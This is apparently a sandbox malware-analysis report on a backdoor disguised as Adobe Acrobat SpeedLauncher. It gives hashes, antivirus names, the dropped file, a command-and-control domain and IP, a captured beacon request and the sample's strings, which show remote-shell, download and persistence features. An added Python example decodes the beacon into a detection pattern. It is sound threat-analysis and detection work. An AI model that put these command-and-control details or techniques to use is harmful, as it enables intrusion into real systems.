Analysis Date: 2014-01-03 11:02:52
MD5: f4ed3b7a8a58453052db4b5be3707342
SHA1: 181f1dd75e95b47e178199c90d9872543fdd4529

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: d1846d4f6e59b61c85cbe19b6e516d8c sha1: e61c108e54760f4f6e2527afa4dbca153c42e756 size: 11264
Section .rdata md5: 6356fbb46ece2cba555bbbf3db04c95d sha1: 546656aa751db6826535dff4d865a399ee6a13ff size: 3584
Section .data  md5: e429b13ab6e7edf6be31052c97ccc546 sha1: 931b446d4b87c625cabb75de0556ef95771931ff size: 2560
Section .rsrc  md5: 8fbfba501adb1c75c8a1c324872ad328 sha1: 94719d1b1a16013df1aa3fe0767cd76b9a6ca7b7 size: 1536
Timestamp: 2010-11-17 13:37:00
Version
LegalCopyright: Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights reserved
FileVersion: 9.0.0.332
CompanyName: Adobe Systems Incorporated
Comments:
ProductName: Adobe Acrobat
ProductVersion: 9, 0, 0, 0
FileDescription: Adobe Acrobat SpeedLauncher
OriginalFilename: AcroSpeedLaunch.exe
Packer: Microsoft Visual C++ v6.0
PEhash: 35fb281c5f462171ab2f2a96af23e2c56b514ad6
AV avira: TR/Downloader.Gen
AV clamav: Win.Trojan.Agent-65195
AV mcafee: RDN/Downloader.a!bi
AV avg: Agent2.BVRT
AV msse: Backdoor:Win32/Likseput.B

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Reader 9.0\Esl\reader_sl.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Adobe\Reader 9.0\Esl\reader_sl.exe

Creates Mutex: GLOBAL\MSFT64
Winsock URL: http://share.canoedaily.com/index/default.htm

Network Details:

DNS: share.canoedaily.com
Type: A
209.222.14.3
HTTP GET: http://share.canoedaily.com/index/default.htm
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; COMPUTER-XXXXXX;Trident/4.0) 01:02
Flows TCP: 192.168.1.1:1031 ➝ 209.222.14.3:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782f64 65666175   GET /index/defau
0x00000010 (00016)   6c742e68 746d2048 5454502f 312e310d   lt.htm HTTP/1.1.
0x00000020 (00032)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000030 (00048)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000040 (00064)   69626c65 3b204d53 49452038 2e303b20   ible; MSIE 8.0; 
0x00000050 (00080)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000060 (00096)   434f4d50 55544552 2d585858 5858583b   COMPUTER-XXXXXX;
0x00000070 (00112)   54726964 656e742f 342e3029 2030313a   Trident/4.0) 01:
0x00000080 (00128)   3032200d 0a486f73 743a2073 68617265   02 ..Host: share
0x00000090 (00144)   2e63616e 6f656461 696c792e 636f6d0d   .canoedaily.com.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....
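The beacon captured in the Raw Pcap above, decoded and checked programmatically. This is an added example, not part of the sandbox report: it rebuilds the request bytes from the hex dump exactly as printed here (the dump text is embedded as constructed input), parses the HTTP request, and matches the User-Agent against a pattern derived from the format string `Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %d.%d; %s;Trident/4.0) %02d:%02d ` listed in the Strings section below, pulling out the value the sample substitutes for `%s` and the time it stamps into each request. Function names are the example's own. Reading `%s` as the computer name is an inference from the `GetComputerNameA` import and the captured value `COMPUTER-XXXXXX`, not something the report states.

```python
import re
from typing import Optional, Tuple

# Constructed input: the request bytes copied from the report's "Raw Pcap"
# hex dump, with its offset, hex and ASCII columns exactly as printed there.
RAW_PCAP_DUMP = """\
0x00000000 (00000)   47455420 2f696e64 65782f64 65666175   GET /index/defau
0x00000010 (00016)   6c742e68 746d2048 5454502f 312e310d   lt.htm HTTP/1.1.
0x00000020 (00032)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000030 (00048)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000040 (00064)   69626c65 3b204d53 49452038 2e303b20   ible; MSIE 8.0; 
0x00000050 (00080)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000060 (00096)   434f4d50 55544552 2d585858 5858583b   COMPUTER-XXXXXX;
0x00000070 (00112)   54726964 656e742f 342e3029 2030313a   Trident/4.0) 01:
0x00000080 (00128)   3032200d 0a486f73 743a2073 68617265   02 ..Host: share
0x00000090 (00144)   2e63616e 6f656461 696c792e 636f6d0d   .canoedaily.com.
0x000000a0 (00160)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000b0 (00176)   6e6f2d63 61636865 0d0a0d0a            no-cache....
"""

# One dump line: "0x<offset> (<decimal>)" then up to four 8-hex-digit groups.
# Only the hex column is captured, so the ASCII column can never be misread
# as data even when it happens to contain hex-looking text.
HEXDUMP_LINE = re.compile(
    r"^0x[0-9a-fA-F]{8}\s+\(\d+\)\s+((?:[0-9a-fA-F]{2,8} ?){1,4})"
)

# Pattern derived from the sample's own format string (Strings section):
#   Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %d.%d; %s;Trident/4.0) %02d:%02d
# Two tells versus a genuine MSIE 8 User-Agent: no space before "Trident" and a
# trailing " HH:MM" after the closing parenthesis. The final space is optional
# so the pattern still fires on proxy logs that trim header values.
BEACON_UA = re.compile(
    r"^Mozilla/4\.0 \(compatible; MSIE 8\.0; Windows NT (?P<major>\d+)\.(?P<minor>\d+); "
    r"(?P<hostname>[^;]+);Trident/4\.0\) (?P<hour>\d{2}):(?P<minute>\d{2}) ?$"
)


def parse_hexdump(dump: str) -> bytes:
    """Rebuild raw bytes from a sandbox-style hex dump, ignoring the ASCII column."""
    out = bytearray()
    for line in dump.splitlines():
        m = HEXDUMP_LINE.match(line)
        if m:
            out += bytes.fromhex("".join(m.group(1).split()))
    return bytes(out)


def parse_http_request(raw: bytes) -> Tuple[str, str, str, dict]:
    """Split a raw HTTP/1.x request into (method, path, version, headers)."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        # Keep trailing whitespace: the beacon's User-Agent ends in a space and
        # that is itself part of the signature, so only the leading space goes.
        headers[name.strip().lower()] = value.lstrip()
    return method, path, version, headers


def match_beacon_ua(ua: str) -> Optional[dict]:
    """Return the fields the sample embeds in its User-Agent, or None if benign."""
    m = BEACON_UA.match(ua)
    if not m:
        return None
    return {
        "os_version": f"{m['major']}.{m['minor']}",
        "hostname": m["hostname"],          # assumed: the %s is GetComputerNameA output
        "beacon_time": f"{m['hour']}:{m['minute']}",
        "trailing_space": ua.endswith(" "),
    }


def detect_beacon(raw: bytes) -> Optional[dict]:
    """Full check over one captured request; None when the User-Agent is not the beacon."""
    method, path, _version, headers = parse_http_request(raw)
    hit = match_beacon_ua(headers.get("user-agent", ""))
    if hit is None:
        return None
    hit.update({
        "method": method,
        "path": path,
        "host": headers.get("host", "").strip(),
        "no_cache": headers.get("cache-control", "").strip().lower() == "no-cache",
    })
    return hit


if __name__ == "__main__":
    print(detect_beacon(parse_hexdump(RAW_PCAP_DUMP)))
```

Run as a script it prints the parsed beacon: host `share.canoedaily.com`, path `/index/default.htm`, OS 5.1, computer name `COMPUTER-XXXXXX`, time 01:02, with the trailing space and `Cache-Control: no-cache` both present. `BEACON_UA` on its own is the part worth carrying into a proxy-log or IDS rule; matching on the hostname field is pointless since it is per-victim, but the missing space before `Trident` and the appended clock reading are constant across infections.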


Strings
040904b0
9, 0, 0, 0
9.0.0.332
AcroSpeedLaunch.exe
Adobe Acrobat
Adobe Acrobat SpeedLauncher
Adobe Systems Incorporated
Comments
CompanyName
Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights Copyright 1984-2008 Adobe Systems Incorporated and its licensors. All rights reserved
FileDescription
FileVersion
LegalCopyright
OriginalFilename
ProductName
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
%-24s %s
%-26s %5d
??2@YAPAXI@Z
??3@YAXPAX@Z
Accept:*/*
_acmdln
_adjust_fdiv
Adobe Reader Speed Launcher
ADVAPI32.dll
 and the PID is %d
\Application Data\Adobe\Reader 9.0\Esl\reader_sl.exe
AttachConsole
blc-dwd
border=
Cache-Control:max-age=0
Cache-Control:no-cache
CD-ROM		
CloseHandle
CloseServiceHandle
\cmd.exe
cmd.exe
CmdPath=
Computer:
%ComSpec%
CONIN$
Content-Length: %d
_controlfp
ControlService
ControlService failed!
CopyFileA
Create failed with %d!
CreateFileA
CreateMutexA
CreatePipe
CreateProcessA
CreateProcessAsUserA
CreateProcess failed!
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
/C "%s"
__CxxFrameHandler
@.data
DefWindowProcA
DeleteFileA
DispatchMessageA
_EH_prolog
EnumServicesStatusExA
_except_handler3
ExitProcess
ExpandEnvironmentStringsA
Failed!
Failed with %d!
FileSize:	%d
Fixed		
GetComputerNameA
GetConsoleDisplayMode
GetCurrentProcess
GetDriveTypeA
GetExitCodeProcess
GetFileAttributesA
GetFileAttributes Error code: %d
GetFileSize
GetLastError
GetLocalTime
GetLogicalDrives
__getmainargs
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetStartupInfoA
GetSystemDirectoryA
GetSystemTime
GetTempFileNameA
GetTempPathA
geturl
GetUserNameA
GetUserNameExA
GetUserProfileDirectoryA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
GLOBAL\MSFT64
<h1>Bad Request (Invalid Hostname)</h1>
HttpAddRequestHeadersA
HttpOpenRequestA
HttpSendRequestA
_initterm
InternetCloseHandle
InternetConnectA
InternetOpenA
InternetOpenUrlA
InternetQueryOptionA
InternetReadFile
InternetSetOptionA
Invalid		
KB968705.bat
KERNEL32.dll
list process failed!
list service failed!
lstrcatA
lstrlenA
MainWndClass
memcpy
memset
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %d.%d; %s;Trident/4.0) %02d:%02d 
Mozilla/5.0
MSVCRT.dll
OpenP failed with %d!
OpenProcess
OpenProcessToken
OpenSCManagerA
OpenSCManager failed!
OpenServiceA
OpenService failed!
OpenT failed with %d!
__p__commode
PeekNamedPipe
__p__fmode
pidrun
Pragma:no-cache
Process32First
Process32Next
Process cmd.exe exited!
Program started!
Proxy-Connection:Keep-Alive
PVVVWV
QVVVPVV
Ramdisk		
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegisterClassExA
RegSetValueExA
Remote		
Removeable		
%*[^/]%*[/]%*[^/]%s
%s Connected!
Secur32.dll
Service does not exist!
Service doesn't start!
Service is running already!
Service started!
Service still running!
Service stopped!
Service stop pending!
__set_app_type
SetCurrentDirectoryA
SetFileTime
SetStdHandle
__setusermatherr
SHCreateDirectoryExA
SHELL32.dll
ShellExecuteA
Shell started fail!
Shell started successfully!
Shell started,wait to terminate it.....
Sleep Time:
Software\Microsoft\Windows\CurrentVersion\Run
So long!
sprintf
sscanf
Started already,
StartServiceA
StartService failed!
Start shell first.
strcat
strchr
_strcmpi
strcpy
strlen
_strnicmp
strrchr
strstr
Syntax error!
Syntax error!	Usage:	getf/putf FileName <N>
Syntax error!	Usage:	GetUrl URL FileName
Syntax error!	Usage:	kill </p|/s> <pid|ServiceName>
Syntax error!	Usage:	list </p|/s|/d>
Syntax error!	Usage:	start </p|/s> <filename|ServiceName>
SystemTimeToFileTime
t0V<#u
t4j SV3
\tasks
TerminateProcess
!This program cannot be run in DOS mode.
t:hLU@
t<Ht2Ht(Ht
Totally %d volumes found.
TranslateMessage
Unkown		
URLDownloadToFileA
urlmon.dll
USER32.dll
USERENV.dll
Volume on this computer:
Volume	Type		Volume Name
VPPPPh
VVhlQ@
VVVhX,@
WaitForSingleObject
whoami
width=
WININET.dll
WPhdR@
WriteConsoleInputA
WriteFile
_XcptFilter
YYh0U@
YYSSSSS
YYSSSVSS
YYt5j\
YYWWVh
YYWWVh93@
ZRichw